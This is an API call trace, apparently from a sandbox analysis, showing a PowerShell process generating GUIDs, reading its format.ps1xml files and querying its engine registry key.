	[0723.630] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb791d76c, Data2=0x31c5, Data3=0x46ef, Data4=([0]=0x84, [1]=0xb1, [2]=0x51, [3]=0x24, [4]=0x5a, [5]=0x77, [6]=0x49, [7]=0xbd))) returned 0x0
	[0723.631] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9933beda, Data2=0xf48f, Data3=0x484b, Data4=([0]=0x98, [1]=0x3c, [2]=0xdb, [3]=0xd, [4]=0xc9, [5]=0x8, [6]=0x1e, [7]=0x78))) returned 0x0
	[0723.631] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x59a1c3e7, Data2=0x3cb3, Data3=0x4b7a, Data4=([0]=0x81, [1]=0x6f, [2]=0x25, [3]=0xa, [4]=0xf, [5]=0x59, [6]=0xb9, [7]=0x3d))) returned 0x0
	[0723.631] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x1f6e4a40, Data2=0x7d5c, Data3=0x4adc, Data4=([0]=0x84, [1]=0x1b, [2]=0x4a, [3]=0x45, [4]=0xaa, [5]=0xa3, [6]=0x68, [7]=0xa))) returned 0x0
	[0723.632] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x191559ab, Data2=0xdc2, Data3=0x49e1, Data4=([0]=0x9c, [1]=0xd5, [2]=0x6f, [3]=0x65, [4]=0xe8, [5]=0xb4, [6]=0x5e, [7]=0xf5))) returned 0x0
	[0723.632] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x225d4fec, Data2=0x5f41, Data3=0x492f, Data4=([0]=0xbb, [1]=0x0, [2]=0xd4, [3]=0x46, [4]=0x66, [5]=0xfa, [6]=0x2f, [7]=0x5c))) returned 0x0
	[0723.634] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x996057e3, Data2=0xcc84, Data3=0x44cf, Data4=([0]=0x9b, [1]=0x7a, [2]=0x7e, [3]=0x9b, [4]=0x99, [5]=0xc5, [6]=0xd6, [7]=0xd5))) returned 0x0
	[0723.634] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x26ebf50, Data2=0x3506, Data3=0x4b38, Data4=([0]=0xba, [1]=0x86, [2]=0xf4, [3]=0x12, [4]=0x22, [5]=0xa0, [6]=0xaf, [7]=0x6c))) returned 0x0
	[0723.634] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x916466ab, Data2=0x5d97, Data3=0x4836, Data4=([0]=0xbc, [1]=0xa3, [2]=0x2f, [3]=0xc1, [4]=0x41, [5]=0x7d, [6]=0x5f, [7]=0xf))) returned 0x0
	[0723.635] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xca5ef3d0, Data2=0xa712, Data3=0x4c93, Data4=([0]=0xa7, [1]=0x4a, [2]=0x67, [3]=0x7f, [4]=0x2e, [5]=0x72, [6]=0x94, [7]=0xd9))) returned 0x0
	[0723.635] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x62f74fb4, Data2=0x750, Data3=0x4a3e, Data4=([0]=0xad, [1]=0xfb, [2]=0x93, [3]=0x17, [4]=0xff, [5]=0xf5, [6]=0x70, [7]=0x83))) returned 0x0
	[0723.636] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xfccae89d, Data2=0x7800, Data3=0x4bc1, Data4=([0]=0x8b, [1]=0x22, [2]=0x11, [3]=0x3a, [4]=0x5c, [5]=0xba, [6]=0xbb, [7]=0x7f))) returned 0x0
	[0723.636] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x5e544f2b, Data2=0x4008, Data3=0x4035, Data4=([0]=0x8f, [1]=0x4f, [2]=0xda, [3]=0x57, [4]=0xc4, [5]=0x64, [6]=0x85, [7]=0xa1))) returned 0x0
	[0725.256] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x73682586, Data2=0xff64, Data3=0x47b4, Data4=([0]=0x86, [1]=0xaa, [2]=0x1b, [3]=0x91, [4]=0x4f, [5]=0x80, [6]=0x53, [7]=0x17))) returned 0x0
	[0725.256] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xbd3bcf20, Data2=0xa0af, Data3=0x49a9, Data4=([0]=0x83, [1]=0x33, [2]=0xd7, [3]=0x13, [4]=0x8a, [5]=0x4a, [6]=0xeb, [7]=0x30))) returned 0x0
	[0725.257] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xe3d6b941, Data2=0x3fdc, Data3=0x4c0c, Data4=([0]=0x95, [1]=0x45, [2]=0xba, [3]=0xb9, [4]=0x7f, [5]=0x8f, [6]=0xa4, [7]=0x9b))) returned 0x0
	[0725.259] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x97342a02, Data2=0xb0ef, Data3=0x43d0, Data4=([0]=0xb9, [1]=0x5, [2]=0xc5, [3]=0x15, [4]=0xe7, [5]=0x2c, [6]=0x8f, [7]=0x19))) returned 0x0
	[0725.259] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xc3ae1209, Data2=0xad20, Data3=0x4e21, Data4=([0]=0x94, [1]=0x2c, [2]=0xbf, [3]=0x4c, [4]=0xda, [5]=0x67, [6]=0x8b, [7]=0xbe))) returned 0x0
	[0725.260] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xfc959973, Data2=0xaf1e, Data3=0x4559, Data4=([0]=0xa1, [1]=0xde, [2]=0x1, [3]=0xfd, [4]=0xfb, [5]=0x65, [6]=0x32, [7]=0x3a))) returned 0x0
	[0725.260] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x6ceddf69, Data2=0x7df6, Data3=0x4e0b, Data4=([0]=0x93, [1]=0xbb, [2]=0x31, [3]=0xbf, [4]=0x82, [5]=0x77, [6]=0x69, [7]=0xf6))) returned 0x0
	[0725.261] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x3c46b5d3, Data2=0xcbcf, Data3=0x4a45, Data4=([0]=0x8a, [1]=0xe8, [2]=0x5f, [3]=0xe0, [4]=0x51, [5]=0x31, [6]=0x2d, [7]=0xda))) returned 0x0
	[0725.262] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x854d0806, Data2=0xbaea, Data3=0x4649, Data4=([0]=0x9d, [1]=0xe, [2]=0x3e, [3]=0x5f, [4]=0x6c, [5]=0x91, [6]=0x27, [7]=0xcf))) returned 0x0
	[0725.262] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xeaa4c7db, Data2=0xde31, Data3=0x40cc, Data4=([0]=0x98, [1]=0x38, [2]=0x95, [3]=0x69, [4]=0x4d, [5]=0x57, [6]=0x54, [7]=0xd2))) returned 0x0
	[0725.262] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x91b75771, Data2=0x6273, Data3=0x46f9, Data4=([0]=0xa4, [1]=0xe8, [2]=0x6, [3]=0xbd, [4]=0xaf, [5]=0x93, [6]=0x9d, [7]=0xb0))) returned 0x0
	[0725.262] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xd979be2e, Data2=0x2be9, Data3=0x4bc9, Data4=([0]=0xbb, [1]=0x74, [2]=0xa4, [3]=0x7c, [4]=0x7c, [5]=0x2c, [6]=0x1, [7]=0x4e))) returned 0x0
	[0725.263] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x8e70eed2, Data2=0x64a9, Data3=0x4e1e, Data4=([0]=0x97, [1]=0x2c, [2]=0xfc, [3]=0x93, [4]=0xde, [5]=0x65, [6]=0xe3, [7]=0xc3))) returned 0x0
	[0725.263] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x2c378005, Data2=0x6a59, Data3=0x40b8, Data4=([0]=0x8a, [1]=0x1b, [2]=0xfa, [3]=0x9, [4]=0x19, [5]=0x4b, [6]=0x3d, [7]=0x23))) returned 0x0
	[0725.263] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x47098fbc, Data2=0x76b, Data3=0x4c54, Data4=([0]=0xbb, [1]=0xe5, [2]=0x15, [3]=0x68, [4]=0x3c, [5]=0x67, [6]=0x25, [7]=0x1b))) returned 0x0
	[0725.263] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x27445fb8, Data2=0xb6a2, Data3=0x4660, Data4=([0]=0x86, [1]=0xb9, [2]=0x11, [3]=0xb9, [4]=0x18, [5]=0x56, [6]=0x67, [7]=0x8a))) returned 0x0
	[0725.263] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa6d66c76, Data2=0xc89e, Data3=0x4dc6, Data4=([0]=0xbe, [1]=0xa2, [2]=0xe2, [3]=0x87, [4]=0xc8, [5]=0xd, [6]=0xb6, [7]=0xb))) returned 0x0
	[0725.264] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x86b0108b, Data2=0x9002, Data3=0x407b, Data4=([0]=0x8e, [1]=0x7, [2]=0x82, [3]=0x13, [4]=0x9d, [5]=0x7, [6]=0x69, [7]=0x56))) returned 0x0
	[0725.264] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0725.264] GetFileType (hFile=0x308) returned 0x1
	[0725.264] SetErrorMode (uMode=0x1) returned 0x1
	[0725.265] GetFileType (hFile=0x308) returned 0x1
	[0725.265] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.266] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.266] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.266] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.266] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.266] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.267] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x119, lpOverlapped=0x0) returned 1
	[0725.267] ReadFile (in: hFile=0x308, lpBuffer=0x2ce9e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ce9e58*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0725.267] CloseHandle (hObject=0x308) returned 1
	[0725.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0725.267] SetErrorMode (uMode=0x1) returned 0x1
	[0725.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1a0 | out: lpFileInformation=0x26d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0725.267] SetErrorMode (uMode=0x1) returned 0x1
	[0725.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0725.268] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x308) returned 0x0
	[0725.268] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0725.268] CoTaskMemAlloc (cb=0x5a) returned 0x1b890070
	[0725.268] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890070, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0725.268] CoTaskMemFree (pv=0x1b890070) 
	[0725.268] RegCloseKey (hKey=0x308) returned 0x0
	[0725.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0725.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0725.269] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x33617de0, Data2=0x50ad, Data3=0x472d, Data4=([0]=0x87, [1]=0x91, [2]=0x66, [3]=0x89, [4]=0xf5, [5]=0xed, [6]=0x56, [7]=0xff))) returned 0x0
	[0725.269] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb39efdcc, Data2=0xbaf0, Data3=0x44bf, Data4=([0]=0xb6, [1]=0xc6, [2]=0x29, [3]=0x78, [4]=0xe7, [5]=0xc5, [6]=0xf2, [7]=0xaa))) returned 0x0
	[0725.270] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x26aaa5dc, Data2=0x1dd2, Data3=0x4fc6, Data4=([0]=0x99, [1]=0xe2, [2]=0x8, [3]=0xe, [4]=0x81, [5]=0xdb, [6]=0xf0, [7]=0xd0))) returned 0x0
	[0725.270] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xf48fb578, Data2=0x5fdf, Data3=0x40f1, Data4=([0]=0xa2, [1]=0xa7, [2]=0xcc, [3]=0xc3, [4]=0x51, [5]=0x33, [6]=0x70, [7]=0x55))) returned 0x0
	[0725.270] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0725.270] GetFileType (hFile=0x308) returned 0x1
	[0725.270] SetErrorMode (uMode=0x1) returned 0x1
	[0725.270] GetFileType (hFile=0x308) returned 0x1
	[0725.270] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.271] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.271] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.272] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.272] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.272] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.272] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.272] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.274] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.275] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.275] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.275] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.275] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.275] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.275] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.276] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.277] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.277] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.278] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.278] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.278] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.280] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.280] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.280] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.281] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.281] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.281] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.282] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.282] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.282] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.283] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0725.283] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.844] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.844] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.844] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.845] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.845] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.845] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
